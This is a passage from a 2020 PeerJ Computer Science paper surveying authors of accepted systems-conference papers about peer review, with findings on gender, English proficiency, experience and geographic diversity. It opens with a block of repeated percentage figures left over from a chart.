66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 66.07% 82.14%94.64% 66.07% 62.5% 66.07% 82.14%94.64% 66.07% 62.5% 66.07% 82.14%94.64% 66.07% 62.5% 66.07% 82.14%94.64% 66.07% 62.5% 66.07% 82.14%94.64% 66.07% 66.07% 82.14%94.64% 66.07% 66.07% 82.14%94.64% 66.07% 66.07% 82.14%94.64% 66.07% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 66.07%94.64% 66.07% 62.5% 66.07%94.64% 66.07% 62.5% 66.07%94.64% 66.07% 62.5% 66.07%94.64%94.64%94.64%94.64%94.64%94.64%94.64%94.64% 66.07% 64.29% 82.14%94.64% 66.07% 64.29% 82.14%94.64% 66.07% 64.29% 82.14%94.64% 66.07% 64.29% 82.14%66.07% 64.29% 66.07% 62.5% 82.14%66.07% 64.29% 66.07% 62.5% 82.14%66.07% 64.29% 66.07% 62.5% 82.14%66.07% 64.29% 66.07% 62.5% 82.14%66.07% 64.29% 66.07% 62.5% 82.14%94.64%94.64%94.64%94.64%94.64% 66.07% 82.14%94.64% 66.07% 82.14%94.64% 66.07% 82.14%94.64% 66.07% 82.14%94.64% 66.07% 82.14%94.64% 66.07% 82.14%94.64%94.64%94.64%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 66.07% 82.14%94.64% 66.07% 66.07% 82.14%94.64% 66.07% 66.07% 82.14%94.64% 66.07% 66.07% 82.14%94.64% 66.07% 66.07% 82.14%94.64% 66.07% 66.07% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64%94.64%94.64%94.64%94.64%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64%94.64%94.64%94.64% 62.5% 64.29% 66.07% 82.14%94.64% 62.5% 64.29% 66.07% 82.14%94.64% 62.5% 64.29% 66.07% 82.14%94.64% 62.5% 64.29% 66.07% 82.14%94.64% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 66.07% 82.14%94.64% 66.07% 62.5% 66.07% 82.14%94.64% 66.07% 62.5% 66.07% 82.14%94.64% 66.07% 62.5% 66.07% 82.14%94.64% 66.07% 62.5% 66.07% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64%94.64%94.64%94.64%94.64%94.64%94.64%94.64%94.64%94.64%94.64%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 66.07% 82.14%94.64% 66.07% 62.5% 66.07% 82.14%94.64% 66.07% 62.5% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64%94.64%94.64%94.64%94.64%94.64%94.64%94.64%94.64%94.64%94.64% 62.5% 66.07%94.64% 62.5% 66.07%94.64% 62.5% 66.07%94.64% 62.5% 66.07%94.64%94.64%94.64%94.64% 66.07% 62.5% 64.29%94.64% 66.07% 62.5% 64.29% 66.07%94.64% 66.07% 62.5% 64.29% 66.07%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 82.14%94.64% 66.07%94.64% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64%94.64%94.64%94.64%94.64% 66.07% 82.14%94.64% 66.07%94.64% 66.07% 82.14%94.64% 66.07% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64%94.64%94.64%94.64%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64%94.64%94.64%94.64%94.64%94.64%94.64%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64%94.64%94.64%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 66.07% 66.07% 82.14%94.64% 66.07% 66.07% 82.14%94.64% 66.07% 66.07% 82.14%94.64% 66.07% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64%94.64%94.64%94.64%94.64%94.64%94.64%94.64%94.64%94.64%94.64%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5%94.64% 66.07% 62.5% 64.29% 66.07% 62.5%94.64% 66.07% 62.5% 64.29% 66.07% 62.5%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64%94.64%94.64%94.64%94.64%94.64%94.64%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64%94.64%94.64%94.64% 82.14%94.64% 82.14%94.64%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 66.07%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64%94.64%94.64%94.64%94.64%94.64%94.64%94.64%94.64% 62.5% 64.29% 66.07% 82.14%94.64% 62.5% 64.29% 66.07% 82.14%94.64% 62.5% 64.29% 66.07% 82.14%94.64% 62.5% 64.29% 66.07% 82.14%94.64% 62.5% 64.29% 66.07% 82.14%94.64%94.64%94.64%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 64.29% 66.07% 82.14%94.64% 64.29% 66.07% 82.14%94.64% 64.29% 66.07% 82.14%94.64% 64.29% 66.07% 82.14%94.64% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64%94.64%94.64%94.64%94.64%94.64%94.64%94.64%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%66.07% 62.5% 64.29% 66.07% 82.14%66.07% 62.5% 64.29% 66.07% 82.14%66.07% 62.5% 64.29% 66.07% 82.14%66.07% 62.5% 64.29% 66.07% 82.14% 0.00 0.25 0.50 0.75 1.00 Overall Technical Presentation Impact Originality Relevance Confidence Category N o rm a liz e d g ra d e Figure 2 Normalized scores and response distribution. Diamonds represent mean scores. Bars repre- sent median scores, with a notched 95-pct confidence. N is the number of scores received in each category. Shown below N is the percentage of conferences that used each grade category. Full-size DOI: 10.7717/peerjcs.299/fig-2 Conceivably, an out-of-scope paper could simply get rejected and excluded from our dataset. Alternatively, this grade could be so important that papers are at a much higher risk of rejection if they are mismatched with the conference’s scope, even if they rank well in the other categories. Unfortunately, without data on rejected papers we do not have enough information to discriminate between these two extremes. DISCUSSION AND AUTHOR DIVERSITY In this section we address differences in survey responses based on aspects of author diversity that arise from the available data. Gender Women represent only approximately 20–30% of CS researchers overall (Wang et al., 2019). In our data, the percentage is about half that, with only 10.5% female survey respondents. What factors could explain this lower ratio? Frachtenberg and Koster (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.299 13/23 https://peerj.com https://doi.org/10.7717/peerjcs.299/fig-2 http://dx.doi.org/10.7717/peerj-cs.299 One potential explanation is selection bias: women might be less inclined to respond to this survey. However, the percentage of women across respondents and nonrespondents alike, 11%, is actually very close. Another explanation may be that women publish less than men in systems. Indeed, women in our dataset did average fewer total past publications: 0.85 compared to men’s 1.06. Nevertheless, this gap is not large enough to explain the 2–3x representation gap with the rest of CS and is not unique to systems (Elsevier, 2017). A third explanation could be that female authors’ papers are rejected at a higher rate than males’. We cannot test this hypothesis directly without data on rejected papers. However, three pieces of evidence weaken this explanation: 1. The ratio of women in the 25 double-blind conferences, where reviewers presumably remain oblivious of the authors’ gender, is in fact slightly lower than for single-blind conferences (10.06% vs. 10.94%, χ2=3.032, p=0.22). This ratio does not support an explanation that reviewers reject females at a higher rate when they can look up the author’s gender. 2. When we limit our observation to lead authors only, where the author’s gender may be more visible to the reviewers, the ratio of women is actually slightly higher than in the overall author population (11.25% vs. 10.48%, χ2 =1.143, p=0.285). If we assume no differences in the submission rates to a conference based on gender, then female lead authors appear to suffer no more rejections than male authors. 3. We found no statistically significant differences in the overall acceptance grades of women and men (t =0.291, p=0.772), even when limiting to lead authors (t =0.577, p=0.566), papers accepted on their first attempt (t =0.081, p=0.935), or single-blind reviews (t =1.159, p=0.253). This equitability extends to most other grade categories, except for originality (t =4.844, p < 0.0001) and technical merit in single-blind conferences (t =2.288, p=0.0294). In both categories, women scored significantly higher than men. It remains unclear whether there is any causal relationship here, and if so, in which direction; do women have to score higher than men in the technical categories to be accepted in single-blind conferences, or do women submit higher- quality papers to begin with? At any rate, this small difference is unlikely to explain the 2–3x difference in women’s ratio compared to CS, but it does provide a case for wider adoption of double-blind reviewing. These distinctions were not the only gender differences in our survey. Women also reported reviewers as somewhat more understanding, helpful, and fair than men did (χ2 =12.01, p=0.062, χ2 =10.87, p=0.028, and χ2 =7.06, p=0.32, respectively). On the other hand, papers authored by women averaged a few more prior submissions: 0.95 compared to men’s 0.64 (t =3.34, p=0.001). Note, however, that review quality and prior submissions are strongly linked. In other words, a paper with a longer submission history tends to rate higher on reviewer understanding, helpfulness, and fairness. When correcting for submission history length, these gender differences lose statistical significance. In summary, our data does not exhibit large statistical gender differences in the review process, and in particular it does not help to explain the large gender gap in systems. Frachtenberg and Koster (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.299 14/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.299 Addressing this problem may require focusing our attention elsewhere (Ceci & Williams, 2011). English proficiency Another aspect of diversity in scientific publication is English-level proficiency (Lee et al., 2013; Murray et al., 2019). All of the papers, reviews, and communications in our conferences were conducted in English, but many authors and reviewers are nonnative English speakers (NNES). The effective use of language can affect both reviewers’ understanding of the works and authors’ understanding of the reviews (Crovella, 2008; Editage Insights, 2018; Flowerdew, 1999 Flowerdew, 2001). How does the author experience vary based on this factor? At least in our dataset, the answer appears to be ‘‘not much.’’ From an objective grading perspective, all but one of the review categories exhibit very similar distributions, both for teams with native English speakers and for teams with none. These categories include the presentation grade (t =0.638, p=0.524), where language skills presumably would make the most difference. The only exception was the originality grade, where teams with no native speakers averaged a normalized grade that was slightly higher than the native speakers’ teams (0.65 vs. 0.596, t =2.578, p=0.0102). As for the subjective experience of authors, NNES do feel differently about how well reviewers understand their work (χ2 =9.984, p=0.0187), but perhaps not in the way that we would expect; of those reviews with reportedly poor understanding, only 2.4% were from all-NNES teams, compared to 35.1% all-NNES teams in the better-understood reviews. The overall rate of NNES teams among survey responses was 45.8%, so clearly most of them did not feel misunderstood. Similar to women, NNES average higher prior submissions, 0.71, compared to native speakers’ 0.65 (t =1.21, p=0.23), which may be the stronger explanatory variable. We also tried to look in the opposite direction: how does the English level of the reviewers affect how well understood the authors feel? We do not know who reviewed whose paper, or even a reviewer’s native language or nationality. However, we can try to estimate it indirectly by looking at their affiliation’s country. We first guess the country of residence of reviewers by looking at their email affiliation, extract a country when possible, and look up whether this country includes English as one of its official languages. We then look at the conference PC overall demographics and assign each conference a value corresponding to the percent of PC members affiliated with an English-speaking country. Program committees range from 91% English speakers (SOCC) to 24% (EuroPar), and average 68.5%. As it turns out, this proportion has no significant association with the reported understanding level of the reviews for the conference. These negative findings could suggest that in the overall picture of systems research, English proficiency is merely one resource in the multidimensional skill set required to publish successfully (Bardi, 2015; Ferguson, Pérez-Llantada & Plo, 2011; Rozycki & Johnson, 2013) and that the binary distinction of native/nonnative speaker may be inadequate to capture even this skill alone. Frachtenberg and Koster (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.299 15/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.299 0.0 0.2 0.4 1 10 100 1000 Number of previous publications (log scale) P ro p o rt io n o f a u th o rs Figure 3 Distribution of past publications of all authors, near the time of their first 2017 publication. Full-size DOI: 10.7717/peerjcs.299/fig-3 Publication experience As mentioned in the Methods section, we collected data from authors’ GS profile whenever available and uniquely identifiable (66.4% of our survey respondents). We can use this bibliometric data as an approximate proxy for the previous research experience of authors. For example, Fig. 3 depicts the distribution of one such metric, the number of previous publications of each author (circa their conference’s date), which appears approximately log-normal. Since we collected this metric for all authors, not just survey respondents, we can compare the distributions for both populations. Both distributions are similar enough to lead us to believe that no selection bias by experience occurred in this survey (t =2.2, p=0.028). We can also look at the more complex H-index metric (Hirsch, 2005) to evaluate differences in response rate by researcher seniority. Some 35.7% of respondents had an H- index of 5 or less, roughly corresponding to the percentage of self-identified students. This percentage is nearly identical in the overall author population (33.4%), again confirming that the large number of students in our survey is representative of the author population. This large representation of students is important in light of our previous findings about the differences between survey responses of students and of more experienced researchers. For example, students in our survey overwhelmingly prefer a rebuttal process. More experienced researchers commented in the survey that they tend to value this process less, which may affect conference policies, because those are also decided by experienced researchers. Nevertheless, their high value to inexperienced researchers (as well as NNES) may render the effort worthwhile (Langford, 2013). Frachtenberg and Koster (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.299 16/23 https://peerj.com https://doi.org/10.7717/peerjcs.299/fig-3 http://dx.doi.org/10.7717/peerj-cs.299 Table 11 Number and percentage of survey respondents and total authors by geographical region, in descending number of total authors. Region Respondents Percentage All authors Percentage Northern America 471 57.7 3510 56.0 Eastern Asia 80 9.8 831 13.2 Western Europe 103 12.6 826 13.2 Northern Europe 55 6.7 363 5.8 Southern Europe 42 5.1 235 3.7 Western Asia 14 1.7 128 2.0 Southern Asia 18 2.2 102 1.6 South-Eastern Asia 7 0.9 89 1.4 Australia and New Zealand 7 0.9 85 1.4 South America 9 1.1 64 1.0 Eastern Europe 10 1.2 40 0.6 As previously discussed, we found no correlation between the experience of a paper’s lead author and its research or submission history in months and submissions. The same is true when comparing the number of past rejections with the past publications of a paper’s most-experienced author (r =0.004, p=0.91), least-experienced, mean and median experience. We also found no correlation between an author’s experience and their response to the understanding or helpfulness of the reviews. We believe that these negative findings are an overall positive indication that the peer-review process is fair and blind to experience, although a full analysis requires incorporating rejected papers as well. We did find a weak association, however, between authors’ experience and the reviews’ perceived fairness (χ2 =14.662, p=0.0231), which was also observed in the ISCA community for fairness and helpfulness (Jerger et al., 2017). Geographical regions Although we did not specifically ask authors for their country of residence, we can infer this information for most authors from their email addresses. We can then aggregate authors based on the region of the world that their email affiliation belongs to and compare the distribution of ratios between survey respondents and all of the authors. Table 11 shows these distributions (omitting any authors with unidentifiable country and any regions with two authors or fewer). It is encouraging to see that the two distributions are fairly similar (t =−1.603, p=0.139), which suggests that any selection bias based on geographical region is also limited. Unsurprisingly, most of these researchers hail from the West, much more so than in other fields (Clarivate Analytics, 2018). One possible explanation is that systems research can require expensive hardware, and is therefore more likely to occur in the well-endowed research institutions and companies of the developed world. Regardless of explanation, this data shows a strong dissonance between country population and representation in published systems research, leading in turn to poor geographical diversity. Frachtenberg and Koster (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.299 17/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.299 A final point of interest is to combine all these metrics to look at NNES who migrate to or reside in an English-speaking country. Of the 713 respondents with a identifiable email affiliation, 439 reside in the US, and 51 more in the UK, Canada, and Australia. Of the US-based researchers, 59.7% identify as NNES. This group of migrants and visitors exhibits different demographic characteristics than the native US researchers. These migrants show a higher rate of students (55% vs. 29.9%, χ2 =25.727, p < 0.0001), which coincides with a lower research experience (median H-index of 6 vs. 11, t =−4.606, p < 0.0001), and somewhat higher rate of academic sector affiliation (92.4% vs. 87.6%, χ2 =2.281, p=0.131). These immigrants and visitors, however, exhibit the same gender imbalance as the locals, with a female respondent rate of 13% vs. 12.4%, χ2=0.001, p=0.982). CONCLUSIONS AND FUTURE WORK This paper presented a new survey of conference authors, exposing the experience of authors across a large section of computer systems. We placed a strong emphasis on examining responses across various author demographics and found no selection bias based on the authors’ gender, experience, position, geographical region, or paper. We think these responses are representative of authors of accepted papers throughout the field of systems, and can be used to inform future conference policies, such as double-blind reviews and author rebuttal. The former remains an important research question, and we plan to explore it with our survey data in future work. Most survey takers found the opportunity to respond to reviewers valuable, even if it did not change their review grades. The implication for PC chairs, and by extension, educators, may be that while a response process to technical feedback is of little value to experienced practitioners, novices do find it overwhelmingly helpful. Students are well represented in this survey, possibly because systems research often requires elaborate implementation efforts, including multiple graduate students. Students’ responses to the survey could be useful for conferences with an educational mission to better address this target audience. A related finding is that longer feedback is generally perceived as more helpful, understanding, and fair, which in turn may serve as another factor in improving students’ experience. Overall, we found that published authors in systems exhibit a good mix of work sectors, research experience, and English proficiency, but poor diversity across gender and geographical regions. Women in particular represent an alarmingly small group of authors in systems research, and this paper looked at whether the peer-review process plays a role in this underrepresentation, as has been found in some grant and job evaluations (Lee et al., 2013). For female authors of accepted papers, we found that their papers tend to have a slightly longer submission history. However, we found little evidence of negative outcomes in the reviews that they received or experience they perceived, even when their identity is known to the reviewers. Nonnative English speakers also appear to experience no specific adverse effects from peer review, and in fact often report more positively on their experiences than native speakers. Both of these findings can help focus the diversity effort on other policies, at least for accepted authors. The larger question of nativism in peer review requires data on rejected papers, and is not answered in this paper. Frachtenberg and Koster (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.299 18/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.299 In terms of conference policies, the two main qualitative conclusions that we draw from the quantitative results are that from the authors’ perspective, review response or rebuttal can be very valuable, and that short reviews often are not. Conference chairs may take these findings into consideration in their review policies, especially if they intend to attract junior researchers. This dataset remains rich for exploration of the many questions that fell outside the scope of this paper, such as the following: • Why is the representation of women in systems so low? • Do women actually need to receive higher technical scores in their reviews just to be accepted to single-blind conferences? • What are the effects of double-blind reviewing on the quality of reviews, conferences, and papers? • What other publication differences and commonalities exist between systems and the rest of CS? • How do review grades correlate across categories? • How might reviewer load affect our results? • How do any of these factors affect the eventual success of a paper, as measured by awards or citations? We plan to address these questions and others in subsequent research. Our hope is that by opening up all of the nonprivate data we collected, we also open the door for other researchers to validate our results, extend them, or collaborate on future studies. ACKNOWLEDGEMENTS This work has been supported by the advice of Kelly McConnville and Andrew Bray at Reed College. We also thank Fred Douglis, Jim Fix, Anna Ritz, and Eric Roberts for their helpful remarks. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by a grant from the office of the Dean of the Faculty at Reed College. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Dean of the Faculty at Reed College. Competing Interests The authors declare there are no competing interests. Frachtenberg and Koster (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.299 19/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.299 Author Contributions • Eitan Frachtenberg conceived and designed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • Noah Koster performed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. Ethics The following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): This study and the survey questions were approved by the Reed College IRB (number 2018-S13). Data Availability The following information was supplied regarding data availability: All the code and data (except confidential survey responses) are available at Github: Available at http://github.com/eitanf/sysconf. A snapshot of this repository is also available as a Supplementary File. Additionally, the complete survey questionnaire and anonymized individual survey responses are available as a Supplemental File. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.299#supplemental-information. REFERENCES Anderson T. 2008. Towards a model of computer systems research. Proceedings of the workshop on organizing workshops, conferences, and symposia for computer systems. Available at https://www.usenix.org/legacy/event/wowcs08/tech/full_papers/ anderson1/anderson.pdf. Bardi M. 2015. Learning the practice of scholarly publication in English–a Romanian perspective. English for Specific Purposes 37:98–111 DOI 10.1016/j.esp.2014.08.002. Beverly R, Allman M. 2013. Findings and implications from data mining the IMC review process. ACM SIGCOMM Computer Communication Review 43(1):22–29 DOI 10.1145/2427036.2427040. Ceci SJ, Williams WM. 2011. Understanding current causes of women’s underrepresen- tation in science. Proceedings of the National Academy of Sciences of the United States of America 108(8):3157–3162 DOI 10.1073/pnas.1014871108. Clarivate Analytics. 2018. Global state of peer review. Available at https://publons.com/ static/Publons-Global-State-Of-Peer-Review-2018.pdf. Crovella M. 2008. Openness of the SIGCOMM conference. Available at http://blog. sigcomm.org/2008/09/openness_of_the_sigcomm_confer.html. Daume H. 2015. Some NAACL 2013 statistics on author response, review quality, etc. Natural Language Processing Blog. Available at https://nlpers.blogspot.com/2015/06/ some-naacl-2013-statistics-on-author.html. Frachtenberg and Koster (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.299 20/23 https://peerj.com http://github.com/eitanf/sysconf http://dx.doi.org/10.7717/peerj-cs.299#supplemental-information http://dx.doi.org/10.7717/peerj-cs.299#supplemental-information http://dx.doi.org/10.7717/peerj-cs.299#supplemental-information http://dx.doi.org/10.7717/peerj-cs.299#supplemental-information https://www.usenix.org/legacy/event/wowcs08/tech/full_papers/anderson1/anderson.pdf https://www.usenix.org/legacy/event/wowcs08/tech/full_papers/anderson1/anderson.pdf http://dx.doi.org/10.1016/j.esp.2014.08.002 http://dx.doi.org/10.1145/2427036.2427040 http://dx.doi.org/10.1073/pnas.1014871108 https://publons.com/static/Publons-Global-State-Of-Peer-Review-2018.pdf https://publons.com/static/Publons-Global-State-Of-Peer-Review-2018.pdf http://blog.sigcomm.org/2008/09/openness_of_the_sigcomm_confer.html http://blog.sigcomm.org/2008/09/openness_of_the_sigcomm_confer.html https://nlpers.blogspot.com/2015/06/some-naacl-2013-statistics-on-author.html https://nlpers.blogspot.com/2015/06/some-naacl-2013-statistics-on-author.html http://dx.doi.org/10.7717/peerj-cs.299 DeStefano L. 2018. Analysis of MICRO conference diversity survey results. Available at https://www.microarch.org/docs/diversity-survey-2018.pdf. Editage Insights. 2018. Author perspectives on academic publishing: global survey report 2018. Available at https://campaign.editage.com/global_survey_report_2018/. Elsevier. 2017. Gender in the global research landscape. Available at https://www.elsevier. com/research-intelligence/campaigns/gender-17. Ernst E, Resch K-L. 1994. Reviewer bias: a blinded experimental study. The Journal of Laboratory and Clinical Medicine 124(2):178–182. Ferguson G, Pérez-Llantada C, Plo R. 2011. English as an international language of scientific publication: a study of attitudes. World Englishes 30(1):41–59 DOI 10.1111/j.1467-971X.2010.01656.x. Flowerdew J. 1999. Writing for scholarly publication in English: the case of Hong Kong. Journal of Second Language Writing 8(2):123–145 DOI 10.1016/S1060-3743(99)80125-8. Flowerdew J. 2001. Attitudes of journal editors to nonnative speaker contributions. TESOL Quarterly 35(1):121–150 DOI 10.2307/3587862. Fortnow L. 2009. Time for computer science to grow up. Communications of the ACM 52(9):33–35. Fox MF. 2006. Women, men, and engineering. In: Fox MA, Johnson DG, Rosser SV, eds. Women, gender, and technology. Urbana: University of Chicago Press, 47–59. Frachtenberg E, Kaner R. 2021. Representation of women in high-performance computing conferences. In: First summit on women in high-performance computing. Vancouver: WHPC April 2021. Franceschet M. 2010. The role of conference publications in CS. Communications of the ACM 53(12):129–132. François O. 2015. Arbitrariness of peer review: a Bayesian analysis of the NIPS experi- ment. ArXiv preprint. arXiv:1507.06411. Gans JS, Shepherd GB. 1994. How are the mighty fallen: Rejected classic articles by leading economists. Journal of Economic Perspectives 8(1):165–179. Hames I. 2008. Peer review and manuscript management in scientific journals: guidelines for good practice. Oxford, UK: John Wiley & Sons. Hirsch JE. 2005. An index to quantify an individual’s scientific research output. Proceedings of the National academy of Sciences of the United States of America 102(46):16569–16572 DOI 10.1073/pnas.0507655102. Huang J, Gates AJ, Sinatra R, Barabasi A-L. 2019. Historical comparison of gender inequality in scientific careers across countries and disciplines. 